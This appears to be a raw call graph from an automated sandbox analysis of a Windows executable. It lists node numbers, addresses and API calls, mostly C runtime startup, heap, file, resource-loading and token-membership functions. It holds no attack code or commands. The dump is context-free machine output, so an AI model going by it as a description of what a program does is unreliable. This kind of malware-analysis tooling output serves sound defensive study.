API calls 98998->99003 99017 8a8d68 58 API calls __getptd_noexit 98999->99017 99000->98985 99005 8a9f32 99003->99005 99006 8a9f3f 99005->99006 99007 8a9f57 99005->99007 99018 8aa06b InitializeCriticalSectionAndSpinCount 99006->99018 99019 8a2f95 99007->99019 99010 8a9f4b 99025 8a9f73 LeaveCriticalSection _doexit 99010->99025 99013->98994 99014->98997 99016->98995 99017->99000 99018->99010 99020 8a2fc7 _free 99019->99020 99021 8a2f9e RtlFreeHeap 99019->99021 99020->99010 99021->99020 99022 8a2fb3 99021->99022 99026 8a8d68 58 API calls __getptd_noexit 99022->99026 99024 8a2fb9 GetLastError 99024->99020 99025->99000 99026->99024 99027->98973 99028->98972 99029->98976 99033 8a9fb5 LeaveCriticalSection 99030->99033 99032 8a2ec7 99032->98963 99033->99032 99034 8a7e93 99035 8a7e9f __setmode 99034->99035 99071 8aa048 GetStartupInfoW 99035->99071 99037 8a7ea4 99073 8a8dbc GetProcessHeap 99037->99073 99039 8a7efc 99040 8a7f07 99039->99040 99156 8a7fe3 58 API calls 3 library calls 99039->99156 99074 8a9d26 99040->99074 99043 8a7f0d 99044 8a7f18 __RTC_Initialize 99043->99044 99157 8a7fe3 58 API calls 3 library calls 99043->99157 99095 8ad812 99044->99095 99047 8a7f27 99048 8a7f33 GetCommandLineW 99047->99048 99158 8a7fe3 58 API calls 3 library calls 99047->99158 99114 8b5173 GetEnvironmentStringsW 99048->99114 99051 8a7f32 99051->99048 99054 8a7f4d 99055 8a7f58 99054->99055 99159 8a32f5 58 API calls 3 library calls 99054->99159 99124 8b4fa8 99055->99124 99058 8a7f5e 99059 8a7f69 99058->99059 99160 8a32f5 58 API calls 3 library calls 99058->99160 99138 8a332f 99059->99138 99062 8a7f71 99063 8a7f7c __wwincmdln 99062->99063 99161 8a32f5 58 API calls 3 library calls 99062->99161 99144 88492e 99063->99144 99066 8a7f90 99067 8a7f9f 99066->99067 99162 8a3598 58 API calls _doexit 99066->99162 99163 8a3320 58 API calls _doexit 99067->99163 99070 8a7fa4 __setmode 99072 8aa05e 99071->99072 99072->99037 99073->99039 99164 8a33c7 36 API calls 2 library calls 99074->99164 99076 8a9d2b 99165 8a9f7c InitializeCriticalSectionAndSpinCount __getstream 99076->99165 99078 8a9d30 99079 8a9d34 99078->99079 99167 8a9fca TlsAlloc 99078->99167 99166 8a9d9c 61 API calls 2 library calls 99079->99166 99082 8a9d39 99082->99043 99083 8a9d46 99083->99079 99084 8a9d51 99083->99084 99168 8a8a15 99084->99168 99087 8a9d93 99176 8a9d9c 61 API calls 2 library calls 99087->99176 99090 8a9d98 99090->99043 99091 8a9d72 99091->99087 99092 8a9d78 99091->99092 99175 8a9c73 58 API calls 4 library calls 99092->99175 99094 8a9d80 GetCurrentThreadId 99094->99043 99096 8ad81e __setmode 99095->99096 99097 8a9e4b __lock 58 API calls 99096->99097 99098 8ad825 99097->99098 99099 8a8a15 __calloc_crt 58 API calls 99098->99099 99101 8ad836 99099->99101 99100 8ad841 @_EH4_CallFilterFunc@8 __setmode 99100->99047 99101->99100 99102 8ad8a1 GetStartupInfoW 99101->99102 99107 8ad8b6 99102->99107 99111 8ad9e5 99102->99111 99103 8adaad 99190 8adabd LeaveCriticalSection _doexit 99103->99190 99105 8a8a15 __calloc_crt 58 API calls 99105->99107 99106 8ada32 GetStdHandle 99106->99111 99107->99105 99110 8ad904 99107->99110 99107->99111 99108 8ada45 GetFileType 99108->99111 99109 8ad938 GetFileType 99109->99110 99110->99109 99110->99111 99188 8aa06b InitializeCriticalSectionAndSpinCount 99110->99188 99111->99103 99111->99106 99111->99108 99189 8aa06b InitializeCriticalSectionAndSpinCount 99111->99189 99115 8a7f43 99114->99115 99116 8b5184 99114->99116 99120 8b4d6b GetModuleFileNameW 99115->99120 99191 8a8a5d 58 API calls 2 library calls 99116->99191 99118 8b51aa _memmove 99119 8b51c0 FreeEnvironmentStringsW 99118->99119 99119->99115 99121 8b4d9f _wparse_cmdline 99120->99121 99123 8b4ddf _wparse_cmdline 99121->99123 99192 8a8a5d 58 API calls 2 library calls 99121->99192 99123->99054 99125 8b4fc1 __NMSG_WRITE 99124->99125 99129 8b4fb9 99124->99129 99126 8a8a15 __calloc_crt 58 API calls 99125->99126 99134 8b4fea __NMSG_WRITE 99126->99134 99127 8b5041 99128 8a2f95 _free 58 API calls 99127->99128 99128->99129 99129->99058 99130 8a8a15 __calloc_crt 58 API calls 99130->99134 99131 8b5066 99132 8a2f95 _free 58 API calls 99131->99132 99132->99129 99134->99127 99134->99129 99134->99130 99134->99131 99135 8b507d 99134->99135 99193 8b4857 58 API calls __mbstowcs_l_helper 99134->99193 99194 8a9006 IsProcessorFeaturePresent 99135->99194 99137 8b5089 99137->99058 99140 8a333b __IsNonwritableInCurrentImage 99138->99140 99217 8aa711 99140->99217 99141 8a3359 __initterm_e 99142 8a2f80 __cinit 67 API calls 99141->99142 99143 8a3378 _doexit __IsNonwritableInCurrentImage 99141->99143 99142->99143 99143->99062 99145 884948 99144->99145 99146 8849e7 99144->99146 99147 884982 IsThemeActive 99145->99147 99146->99066 99220 8a35ac 99147->99220 99151 8849ae 99232 884a5b SystemParametersInfoW SystemParametersInfoW 99151->99232 99153 8849ba 99233 883b4c 99153->99233 99155 8849c2 SystemParametersInfoW 99155->99146 99156->99040 99157->99044 99158->99051 99162->99067 99163->99070 99164->99076 99165->99078 99166->99082 99167->99083 99169 8a8a1c 99168->99169 99171 8a8a57 99169->99171 99173 8a8a3a 99169->99173 99177 8b5446 99169->99177 99171->99087 99174 8aa026 TlsSetValue 99171->99174 99173->99169 99173->99171 99185 8aa372 Sleep 99173->99185 99174->99091 99175->99094 99176->99090 99178 8b5451 99177->99178 99182 8b546c 99177->99182 99179 8b545d 99178->99179 99178->99182 99186 8a8d68 58 API calls __getptd_noexit 99179->99186 99181 8b547c RtlAllocateHeap 99181->99182 99183 8b5462 99181->99183 99182->99181 99182->99183 99187 8a35e1 DecodePointer 99182->99187 99183->99169 99185->99173 99186->99183 99187->99182 99188->99110 99189->99111 99190->99100 99191->99118 99192->99123 99193->99134 99195 8a9011 99194->99195 99200 8a8e99 99195->99200 99199 8a902c 99199->99137 99201 8a8eb3 _memset ___raise_securityfailure 99200->99201 99202 8a8ed3 IsDebuggerPresent 99201->99202 99208 8aa395 SetUnhandledExceptionFilter UnhandledExceptionFilter 99202->99208 99205 8a8fba 99207 8aa380 GetCurrentProcess TerminateProcess 99205->99207 99206 8a8f97 ___raise_securityfailure 99209 8ac836 99206->99209 99207->99199 99208->99206 99210 8ac83e 99209->99210 99211 8ac840 IsProcessorFeaturePresent 99209->99211 99210->99205 99213 8b5b5a 99211->99213 99216 8b5b09 5 API calls 2 library calls 99213->99216 99215 8b5c3d 99215->99205 99216->99215 99218 8aa714 EncodePointer 99217->99218 99218->99218 99219 8aa72e 99218->99219 99219->99141 99221 8a9e4b __lock 58 API calls 99220->99221 99222 8a35b7 DecodePointer EncodePointer 99221->99222 99285 8a9fb5 LeaveCriticalSection 99222->99285 99224 8849a7 99225 8a3614 99224->99225 99226 8a3638 99225->99226 99227 8a361e 99225->99227 99226->99151 99227->99226 99286 8a8d68 58 API calls __getptd_noexit 99227->99286 99229 8a3628 99287 8a8ff6 9 API calls __mbstowcs_l_helper 99229->99287 99231 8a3633 99231->99151 99232->99153 99234 883b59 __ftell_nolock 99233->99234 99235 8877c7 59 API calls 99234->99235 99236 883b63 GetCurrentDirectoryW 99235->99236 99288 883778 99236->99288 99238 883b8c IsDebuggerPresent 99239 883b9a 99238->99239 99240 8bd4ad MessageBoxA 99238->99240 99242 8bd4c7 99239->99242 99243 883bb7 99239->99243 99272 883c73 99239->99272 99240->99242 99241 883c7a SetCurrentDirectoryW 99244 883c87 Mailbox 99241->99244 99488 887373 59 API calls Mailbox 99242->99488 99369 8873e5 99243->99369 99244->99155 99247 8bd4d7 99252 8bd4ed SetCurrentDirectoryW 99247->99252 99249 883bd5 GetFullPathNameW 99250 887d2c 59 API calls 99249->99250 99251 883c10 99250->99251 99385 890a8d 99251->99385 99252->99244 99255 883c2e 99256 883c38 99255->99256 99489 8e4c03 AllocateAndInitializeSid CheckTokenMembership FreeSid 99255->99489 99401 883a58 GetSysColorBrush LoadCursorW LoadIconW LoadIconW LoadIconW 99256->99401 99259 8bd50a 99259->99256 99272->99241 99285->99224 99286->99229 99287->99231 99289 8877c7 59 API calls 99288->99289 99290 88378e 99289->99290 99499 883d43 99290->99499 99292 8837ac 99293 884864 61 API calls 99292->99293 99294 8837c0 99293->99294 99295 887f41 59 API calls 99294->99295 99296 8837cd 99295->99296 99513 884f3d 99296->99513 99299 8bd3ae 99584 8e97e5 99299->99584 99300 8837ee Mailbox 99537 8881a7 99300->99537 99303 8bd3cd 99306 8a2f95 _free 58 API calls 99303->99306 99308 8bd3da 99306->99308 99310 884faa 84 API calls 99308->99310 99312 8bd3e3 99310->99312 99316 883ee2 59 API calls 99312->99316 99313 887f41 59 API calls 99314 88381a 99313->99314 99544 888620 99314->99544 99318 8bd3fe 99316->99318 99317 88382c Mailbox 99319 887f41 59 API calls 99317->99319 99320 883ee2 59 API calls 99318->99320 99321 883852 99319->99321 99322 8bd41a 99320->99322 99323 888620 69 API calls 99321->99323 99324 884864 61 API calls 99322->99324 99326 883861 Mailbox 99323->99326 99325 8bd43f 99324->99325 99327 883ee2 59 API calls 99325->99327 99329 8877c7 59 API calls 99326->99329 99328 8bd44b 99327->99328 99330 8881a7 59 API calls 99328->99330 99331 88387f 99329->99331 99332 8bd459 99330->99332 99548 883ee2 99331->99548 99335 883ee2 59 API calls 99332->99335 99336 8bd468 99335->99336 99342 8881a7 59 API calls 99336->99342 99338 883899 99338->99312 99339 8838a3 99338->99339 99340 8a313d _W_store_winword 60 API calls 99339->99340 99341 8838ae 99340->99341 99341->99318 99343 8838b8 99341->99343 99344 8bd48a 99342->99344 99345 8a313d _W_store_winword 60 API calls 99343->99345 99346 883ee2 59 API calls 99344->99346 99347 8838c3 99345->99347 99348 8bd497 99346->99348 99347->99322 99349 8838cd 99347->99349 99348->99348 99350 8a313d _W_store_winword 60 API calls 99349->99350 99351 8838d8 99350->99351 99351->99336 99352 883919 99351->99352 99354 883ee2 59 API calls 99351->99354 99352->99336 99353 883926 99352->99353 99564 88942e 99353->99564 99356 8838fc 99354->99356 99357 8881a7 59 API calls 99356->99357 99359 88390a 99357->99359 99361 883ee2 59 API calls 99359->99361 99361->99352 99364 8893ea 59 API calls 99366 883961 99364->99366 99365 889040 60 API calls 99365->99366 99366->99364 99366->99365 99367 8839a7 Mailbox 99366->99367 99368 883ee2 59 API calls 99366->99368 99367->99238 99368->99366 99370 8873f2 __ftell_nolock 99369->99370 99371 8bee4b _memset 99370->99371 99372 88740b 99370->99372 99375 8bee67 GetOpenFileNameW 99371->99375 99373 8848ae 60 API calls 99372->99373 99374 887414 99373->99374 100374 8a09d5 99374->100374 99377 8beeb6 99375->99377 99378 887d2c 59 API calls 99377->99378 99380 8beecb 99378->99380 99380->99380 99382 887429 100392 8869ca 99382->100392 99386 890a9a __ftell_nolock 99385->99386 100697 886ee0 99386->100697 99388 890a9f 99389 883c26 99388->99389 100708 8912fe 89 API calls 99388->100708 99389->99247 99389->99255 99391 890aac 99391->99389 100709 894047 91 API calls Mailbox 99391->100709 99393 890ab5 99393->99389 99394 890ab9 GetFullPathNameW 99393->99394 99488->99247 99489->99259 99500 883d50 __ftell_nolock 99499->99500 99501 887d2c 59 API calls 99500->99501 99505 883eb6 Mailbox 99500->99505 99502 883d82 99501->99502 99511 883db8 Mailbox 99502->99511 99625 887b52 99502->99625 99504 883e89 99504->99505 99506 887f41 59 API calls 99504->99506 99505->99292 99507 883eaa 99506->99507 99509 883f84 59 API calls 99507->99509 99508 887f41 59 API calls 99508->99511 99509->99505 99510 883f84 59 API calls 99510->99511 99511->99504 99511->99505 99511->99508 99511->99510 99512 887b52 59 API calls 99511->99512 99512->99511 99628 884d13 99513->99628 99518 884f68 LoadLibraryExW 99638 884cc8 99518->99638 99519 8bdd0f 99521 884faa 84 API calls 99519->99521 99523 8bdd16 99521->99523 99525 884cc8 3 API calls 99523->99525 99526 8bdd1e 99525->99526 99664 88506b 99526->99664 99527 884f8f 99527->99526 99528 884f9b 99527->99528 99530 884faa 84 API calls 99528->99530 99532 8837e6 99530->99532 99532->99299 99532->99300 99534 8bdd45 99672 885027 99534->99672 99536 8bdd52 99538 883801 99537->99538 99539 8881b2 99537->99539 99541 8893ea 99538->99541 100099 8880d7 99539->100099 99542 8a0ff6 Mailbox 59 API calls 99541->99542 99543 88380d 99542->99543 99543->99313 99545 88862b 99544->99545 99547 888652 99545->99547 100103 888b13 69 API calls Mailbox 99545->100103 99547->99317 99549 883eec 99548->99549 99550 883f05 99548->99550 99551 8881a7 59 API calls 99549->99551 99552 887d2c 59 API calls 99550->99552 99553 88388b 99551->99553 99552->99553 99554 8a313d 99553->99554 99555 8a3149 99554->99555 99556 8a31be 99554->99556 99558 8a316e 99555->99558 100104 8a8d68 58 API calls __getptd_noexit 99555->100104 100106 8a31d0 60 API calls 3 library calls 99556->100106 99558->99338 99560 8a31cb 99560->99338 99561 8a3155 100105 8a8ff6 9 API calls __mbstowcs_l_helper 99561->100105 99563 8a3160 99563->99338 99565 889436 99564->99565 99566 8a0ff6 Mailbox 59 API calls 99565->99566 99567 889444 99566->99567 99568 883936 99567->99568 100107 88935c 59 API calls Mailbox 99567->100107 99570 8891b0 99568->99570 100108 8892c0 99570->100108 99572 8a0ff6 Mailbox 59 API calls 99574 883944 99572->99574 99573 8891bf 99573->99572 99573->99574 99575 889040 99574->99575 99576 8bf5a5 99575->99576 99577 889057 99575->99577 99576->99577 100123 888d3b 59 API calls Mailbox 99576->100123 99579 88915f 99577->99579 99580 889158 99577->99580 99581 8891a0 99577->99581 99579->99366 99583 8a0ff6 Mailbox 59 API calls 99580->99583 100122 889e9c 60 API calls Mailbox 99581->100122 99583->99579 99585 885045 85 API calls 99584->99585 99586 8e9854 99585->99586 100124 8e99be 99586->100124 99589 88506b 74 API calls 99590 8e9881 99589->99590 99591 88506b 74 API calls 99590->99591 99592 8e9891 99591->99592 99593 88506b 74 API calls 99592->99593 99594 8e98ac 99593->99594 99595 88506b 74 API calls 99594->99595 99596 8e98c7 99595->99596 99597 885045 85 API calls 99596->99597 99598 8e98de 99597->99598 99599 8a594c _W_store_winword 58 API calls 99598->99599 99600 8e98e5 99599->99600 99601 8a594c _W_store_winword 58 API calls 99600->99601 99602 8e98ef 99601->99602 99603 88506b 74 API calls 99602->99603 99604 8e9903 99603->99604 99605 8e9393 GetSystemTimeAsFileTime 99604->99605 99606 8e9916 99605->99606 99607 8e992b 99606->99607 99608 8e9940 99606->99608 99611 8a2f95 _free 58 API calls 99607->99611 99609 8e9946 99608->99609 99610 8e99a5 99608->99610 100130 8e8d90 99609->100130 99613 8a2f95 _free 58 API calls 99610->99613 99614 8e9931 99611->99614 99616 8bd3c1 99613->99616 99617 8a2f95 _free 58 API calls 99614->99617 99616->99303 99619 884faa 99616->99619 99617->99616 99618 8a2f95 _free 58 API calls 99618->99616 99620 884fb4 99619->99620 99622 884fbb 99619->99622 99621 8a55d6 __fcloseall 83 API calls 99620->99621 99621->99622 99623 884fca 99622->99623 99624 884fdb FreeLibrary 99622->99624 99623->99303 99624->99623 99626 887faf 59 API calls 99625->99626 99627 887b5d 99626->99627 99627->99502 99677 884d61 99628->99677 99631 884d3a 99633 884d4a FreeLibrary 99631->99633 99634 884d53 99631->99634 99632 884d61 2 API calls 99632->99631 99633->99634 99635 8a548b 99634->99635 99681 8a54a0 99635->99681 99637 884f5c 99637->99518 99637->99519 99839 884d94 99638->99839 99641 884ced 99643 884d08 99641->99643 99644 884cff FreeLibrary 99641->99644 99642 884d94 2 API calls 99642->99641 99645 884dd0 99643->99645 99644->99643 99646 8a0ff6 Mailbox 59 API calls 99645->99646 99647 884de5 99646->99647 99648 88538e 59 API calls 99647->99648 99649 884df1 _memmove 99648->99649 99650 884e2c 99649->99650 99651 884ee9 99649->99651 99652 884f21 99649->99652 99653 885027 69 API calls 99650->99653 99843 884fe9 CreateStreamOnHGlobal 99651->99843 99854 8e9ba5 95 API calls 99652->99854 99657 884e35 99653->99657 99656 88506b 74 API calls 99656->99657 99657->99656 99659 884ec9 99657->99659 99660 8bdcd0 99657->99660 99849 885045 99657->99849 99659->99527 99661 885045 85 API calls 99660->99661 99662 8bdce4 99661->99662 99663 88506b 74 API calls 99662->99663 99663->99659 99665 88507d 99664->99665 99666 8bddf6 99664->99666 99878 8a5812 99665->99878 99669 8e9393 100076 8e91e9 99669->100076 99671 8e93a9 99671->99534 99673 8bddb9 99672->99673 99674 885036 99672->99674 100081 8a5e90 99674->100081 99676 88503e 99676->99536 99678 884d2e 99677->99678 99679 884d6a LoadLibraryA 99677->99679 99678->99631 99678->99632 99679->99678 99680 884d7b GetProcAddress 99679->99680 99680->99678 99684 8a54ac __setmode 99681->99684 99682 8a54bf 99730 8a8d68 58 API calls __getptd_noexit 99682->99730 99684->99682 99686 8a54f0 99684->99686 99685 8a54c4 99731 8a8ff6 9 API calls __mbstowcs_l_helper 99685->99731 99700 8b0738 99686->99700 99689 8a54f5 99690 8a550b 99689->99690 99691 8a54fe 99689->99691 99693 8a5535 99690->99693 99694 8a5515 99690->99694 99732 8a8d68 58 API calls __getptd_noexit 99691->99732 99715 8b0857 99693->99715 99733 8a8d68 58 API calls __getptd_noexit 99694->99733 99695 8a54cf @_EH4_CallFilterFunc@8 __setmode 99695->99637 99701 8b0744 __setmode 99700->99701 99702 8a9e4b __lock 58 API calls 99701->99702 99713 8b0752 99702->99713 99703 8b07c6 99735 8b084e 99703->99735 99704 8b07cd 99740 8a8a5d 58 API calls 2 library calls 99704->99740 99707 8b0843 __setmode 99707->99689 99708 8b07d4 99708->99703 99741 8aa06b InitializeCriticalSectionAndSpinCount 99708->99741 99709 8a9ed3 __mtinitlocknum 58 API calls 99709->99713 99712 8b07fa EnterCriticalSection 99712->99703 99713->99703 99713->99704 99713->99709 99738 8a6e8d 59 API calls __lock 99713->99738 99739 8a6ef7 LeaveCriticalSection LeaveCriticalSection _doexit 99713->99739 99724 8b0877 __wopenfile 99715->99724 99716 8b0891 99746 8a8d68 58 API calls __getptd_noexit 99716->99746 99718 8b0a4c 99718->99716 99722 8b0aaf 99718->99722 99719 8b0896 99747 8a8ff6 9 API calls __mbstowcs_l_helper 99719->99747 99721 8a5540 99734 8a5562 LeaveCriticalSection LeaveCriticalSection _fprintf 99721->99734 99743 8b87f1 99722->99743 99724->99716 99724->99718 99724->99724 99748 8a3a0b 60 API calls 2 library calls 99724->99748 99726 8b0a45 99726->99718 99749 8a3a0b 60 API calls 2 library calls 99726->99749 99728 8b0a64 99728->99718 99750 8a3a0b 60 API calls 2 library calls 99728->99750 99730->99685 99731->99695 99732->99695 99733->99695 99734->99695 99742 8a9fb5 LeaveCriticalSection 99735->99742 99737 8b0855 99737->99707 99738->99713 99739->99713 99740->99708 99741->99712 99742->99737 99751 8b7fd5 99743->99751 99745 8b880a 99745->99721 99746->99719 99747->99721 99748->99726 99749->99728 99750->99718 99754 8b7fe1 __setmode 99751->99754 99752 8b7ff7 99836 8a8d68 58 API calls __getptd_noexit 99752->99836 99754->99752 99756 8b802d 99754->99756 99755 8b7ffc 99837 8a8ff6 9 API calls __mbstowcs_l_helper 99755->99837 99762 8b809e 99756->99762 99759 8b8049 99838 8b8072 LeaveCriticalSection __unlock_fhandle 99759->99838 99761 8b8006 __setmode 99761->99745 99763 8b80be 99762->99763 99764 8a471a __wsopen_nolock 58 API calls 99763->99764 99767 8b80da 99764->99767 99765 8a9006 __invoke_watson 8 API calls 99766 8b87f0 99765->99766 99768 8b7fd5 __wsopen_helper 103 API calls 99766->99768 99769 8b8114 99767->99769 99776 8b8137 99767->99776 99810 8b8211 99767->99810 99770 8b880a 99768->99770 99771 8a8d34 __chsize_nolock 58 API calls 99769->99771 99770->99759 99772 8b8119 99771->99772 99773 8a8d68 __mbstowcs_l_helper 58 API calls 99772->99773 99774 8b8126 99773->99774 99777 8a8ff6 __mbstowcs_l_helper 9 API calls 99774->99777 99775 8b81f5 99778 8a8d34 __chsize_nolock 58 API calls 99775->99778 99776->99775 99783 8b81d3 99776->99783 99779 8b8130 99777->99779 99780 8b81fa 99778->99780 99779->99759 99781 8a8d68 __mbstowcs_l_helper 58 API calls 99780->99781 99782 8b8207 99781->99782 99784 8a8ff6 __mbstowcs_l_helper 9 API calls 99782->99784 99785 8ad4d4 __alloc_osfhnd 61 API calls 99783->99785 99784->99810 99786 8b82a1 99785->99786 99787 8b82ab 99786->99787 99788 8b82ce 99786->99788 99790 8a8d34 __chsize_nolock 58 API calls 99787->99790 99789 8b7f4d ___createFile GetModuleHandleW GetProcAddress CreateFileW 99788->99789 99800 8b82f0 99789->99800 99791 8b82b0 99790->99791 99792 8a8d68 __mbstowcs_l_helper 58 API calls 99791->99792 99794 8b82ba 99792->99794 99793 8b836e GetFileType 99795 8b83bb 99793->99795 99796 8b8379 GetLastError 99793->99796 99798 8a8d68 __mbstowcs_l_helper 58 API calls 99794->99798 99807 8ad76a __set_osfhnd 59 API calls 99795->99807 99799 8a8d47 __dosmaperr 58 API calls 99796->99799 99797 8b833c GetLastError 99801 8a8d47 __dosmaperr 58 API calls 99797->99801 99798->99779 99802 8b83a0 CloseHandle 99799->99802 99800->99793 99800->99797 99803 8b7f4d ___createFile GetModuleHandleW GetProcAddress CreateFileW 99800->99803 99804 8b8361 99801->99804 99802->99804 99805 8b83ae 99802->99805 99806 8b8331 99803->99806 99808 8a8d68 __mbstowcs_l_helper 58 API calls 99804->99808 99809 8a8d68 __mbstowcs_l_helper 58 API calls 99805->99809 99806->99793 99806->99797 99813 8b83d9 99807->99813 99808->99810 99811 8b83b3 99809->99811 99810->99765 99811->99804 99812 8b8594 99812->99810 99815 8b8767 CloseHandle 99812->99815 99813->99812 99814 8b1b11 __lseeki64_nolock 60 API calls 99813->99814 99833 8b845a 99813->99833 99816 8b8443 99814->99816 99817 8b7f4d ___createFile GetModuleHandleW GetProcAddress CreateFileW 99815->99817 99819 8a8d34 __chsize_nolock 58 API calls 99816->99819 99816->99833 99818 8b878e 99817->99818 99820 8b87c2 99818->99820 99821 8b8796 GetLastError 99818->99821 99819->99833 99820->99810 99822 8a8d47 __dosmaperr 58 API calls 99821->99822 99824 8b87a2 99822->99824 99823 8b848c 99827 8b99f2 __chsize_nolock 82 API calls 99823->99827 99823->99833 99828 8ad67d __free_osfhnd 59 API calls 99824->99828 99825 8b0d2d __close_nolock 61 API calls 99825->99833 99826 8b10ab 70 API calls __read_nolock 99826->99833 99827->99823 99828->99820 99829 8adac6 __write 78 API calls 99829->99833 99830 8b8611 99832 8b0d2d __close_nolock 61 API calls 99830->99832 99831 8b1b11 60 API calls __lseeki64_nolock 99831->99833 99834 8b8618 99832->99834 99833->99812 99833->99823 99833->99825 99833->99826 99833->99829 99833->99830 99833->99831 99835 8a8d68 __mbstowcs_l_helper 58 API calls 99834->99835 99835->99810 99836->99755 99837->99761 99838->99761 99840 884ce1 99839->99840 99841 884d9d LoadLibraryA 99839->99841 99840->99641 99840->99642 99841->99840 99842 884dae GetProcAddress 99841->99842 99842->99840 99844 885003 FindResourceExW 99843->99844 99848 885020 99843->99848 99845 8bdd5c LoadResource 99844->99845 99844->99848 99846 8bdd71 SizeofResource 99845->99846 99845->99848 99847 8bdd85 LockResource 99846->99847 99846->99848 99847->99848 99848->99650 99850 885054 99849->99850 99853 8bddd4 99849->99853 99855 8a5a7d 99850->99855 99852 885062 99852->99657 99854->99650 99858 8a5a89 __setmode 99855->99858 99856 8a5a9b 99868 8a8d68 58 API calls __getptd_noexit 99856->99868 99857 8a5ac1 99870 8a6e4e 99857->99870 99858->99856 99858->99857 99861 8a5aa0 99869 8a8ff6 9 API calls __mbstowcs_l_helper 99861->99869 99862 8a5ac7 99876 8a59ee 83 API calls 5 library calls 99862->99876 99865 8a5aab __setmode 99865->99852 99866 8a5ad6 99877 8a5af8 LeaveCriticalSection LeaveCriticalSection _fprintf 99866->99877 99868->99861 99869->99865 99871 8a6e5e 99870->99871 99872 8a6e80 EnterCriticalSection 99870->99872 99871->99872 99873 8a6e66 99871->99873 99874 8a6e76 99872->99874 99875 8a9e4b __lock 58 API calls 99873->99875 99874->99862 99875->99874 99876->99866 99877->99865 99881 8a582d 99878->99881 99880 88508e 99880->99669 99882 8a5839 __setmode 99881->99882 99883 8a584f _memset 99882->99883 99884 8a587c 99882->99884 99885 8a5874 __setmode 99882->99885 99908 8a8d68 58 API calls __getptd_noexit 99883->99908 99886 8a6e4e __lock_file 59 API calls 99884->99886 99885->99880 99888 8a5882 99886->99888 99894 8a564d 99888->99894 99889 8a5869 99909 8a8ff6 9 API calls __mbstowcs_l_helper 99889->99909 99895 8a5683 99894->99895 99898 8a5668 _memset 99894->99898 99910 8a58b6 LeaveCriticalSection LeaveCriticalSection _fprintf 99895->99910 99896 8a5673 100006 8a8d68 58 API calls __getptd_noexit 99896->100006 99898->99895 99898->99896 99901 8a56c3 99898->99901 99901->99895 99902 8a57d4 _memset 99901->99902 99911 8a4916 99901->99911 99918 8b10ab 99901->99918 99986 8b0df7 99901->99986 100008 8b0f18 58 API calls 3 library calls 99901->100008 100009 8a8d68 58 API calls __getptd_noexit 99902->100009 99907 8a5678 100007 8a8ff6 9 API calls __mbstowcs_l_helper 99907->100007 99908->99889 99909->99885 99910->99885 99912 8a4920 99911->99912 99913 8a4935 99911->99913 100010 8a8d68 58 API calls __getptd_noexit 99912->100010 99913->99901 99915 8a4925 100011 8a8ff6 9 API calls __mbstowcs_l_helper 99915->100011 99917 8a4930 99917->99901 99919 8b10cc 99918->99919 99920 8b10e3 99918->99920 100021 8a8d34 58 API calls __getptd_noexit 99919->100021 99922 8b181b 99920->99922 99927 8b111d 99920->99927 100037 8a8d34 58 API calls __getptd_noexit 99922->100037 99924 8b10d1 100022 8a8d68 58 API calls __getptd_noexit 99924->100022 99925 8b1820 100038 8a8d68 58 API calls __getptd_noexit 99925->100038 99929 8b1125 99927->99929 99934 8b113c 99927->99934 100023 8a8d34 58 API calls __getptd_noexit 99929->100023 99931 8b1131 100039 8a8ff6 9 API calls __mbstowcs_l_helper 99931->100039 99932 8b112a 100024 8a8d68 58 API calls __getptd_noexit 99932->100024 99935 8b1151 99934->99935 99938 8b116b 99934->99938 99939 8b1189 99934->99939 99966 8b10d8 99934->99966 100025 8a8d34 58 API calls __getptd_noexit 99935->100025 99938->99935 99941 8b1176 99938->99941 100026 8a8a5d 58 API calls 2 library calls 99939->100026 100012 8b5ebb 99941->100012 99942 8b1199 99944 8b11bc 99942->99944 99945 8b11a1 99942->99945 100029 8b1b11 60 API calls 3 library calls 99944->100029 100027 8a8d68 58 API calls __getptd_noexit 99945->100027 99946 8b128a 99948 8b1303 ReadFile 99946->99948 99953 8b12a0 GetConsoleMode 99946->99953 99951 8b17e3 GetLastError 99948->99951 99952 8b1325 99948->99952 99950 8b11a6 100028 8a8d34 58 API calls __getptd_noexit 99950->100028 99955 8b17f0 99951->99955 99956 8b12e3 99951->99956 99952->99951 99960 8b12f5 99952->99960 99957 8b1300 99953->99957 99958 8b12b4 99953->99958 100035 8a8d68 58 API calls __getptd_noexit 99955->100035 99967 8b12e9 99956->99967 100030 8a8d47 58 API calls 3 library calls 99956->100030 99957->99948 99958->99957 99961 8b12ba ReadConsoleW 99958->99961 99960->99967 99969 8b15c7 99960->99969 99970 8b135a 99960->99970 99961->99960 99964 8b12dd GetLastError 99961->99964 99963 8b17f5 100036 8a8d34 58 API calls __getptd_noexit 99963->100036 99964->99956 99966->99901 99967->99966 99968 8a2f95 _free 58 API calls 99967->99968 99968->99966 99969->99967 99977 8b16cd ReadFile 99969->99977 99971 8b1447 99970->99971 99973 8b13c6 ReadFile 99970->99973 99971->99967 99975 8b1504 99971->99975 99976 8b14f4 99971->99976 99980 8b14b4 MultiByteToWideChar 99971->99980 99974 8b13e7 GetLastError 99973->99974 99982 8b13f1 99973->99982 99974->99982 99975->99980 100033 8b1b11 60 API calls 3 library calls 99975->100033 100032 8a8d68 58 API calls __getptd_noexit 99976->100032 99978 8b16f0 GetLastError 99977->99978 99985 8b16fe 99977->99985 99978->99985 99980->99964 99980->99967 99982->99970 100031 8b1b11 60 API calls 3 library calls 99982->100031 99985->99969 100034 8b1b11 60 API calls 3 library calls 99985->100034 99987 8b0e02 99986->99987 99991 8b0e17 99986->99991 100073 8a8d68 58 API calls __getptd_noexit 99987->100073 99989 8b0e07 100074 8a8ff6 9 API calls __mbstowcs_l_helper 99989->100074 99992 8b0e4c 99991->99992 99997 8b0e12 99991->99997 100075 8b6234 58 API calls __malloc_crt 99991->100075 99994 8a4916 __stbuf 58 API calls 99992->99994 99995 8b0e60 99994->99995 100040 8b0f97 99995->100040 99997->99901 99998 8b0e67 99998->99997 99999 8a4916 __stbuf 58 API calls 99998->99999 100000 8b0e8a 99999->100000 100000->99997 100001 8a4916 __stbuf 58 API calls 100000->100001 100002 8b0e96 100001->100002 100002->99997 100003 8a4916 __stbuf 58 API calls 100002->100003 100004 8b0ea3 100003->100004 100005 8a4916 __stbuf 58 API calls 100004->100005 100005->99997 100006->99907 100007->99895 100008->99901 100009->99907 100010->99915 100011->99917 100013 8b5ec6 100012->100013 100015 8b5ed3 100012->100015 100014 8a8d68 __mbstowcs_l_helper 58 API calls 100013->100014 100016 8b5ecb 100014->100016 100017 8b5edf 100015->100017 100018 8a8d68 __mbstowcs_l_helper 58 API calls 100015->100018 100016->99946 100017->99946 100019 8b5f00 100018->100019 100020 8a8ff6 __mbstowcs_l_helper 9 API calls 100019->100020 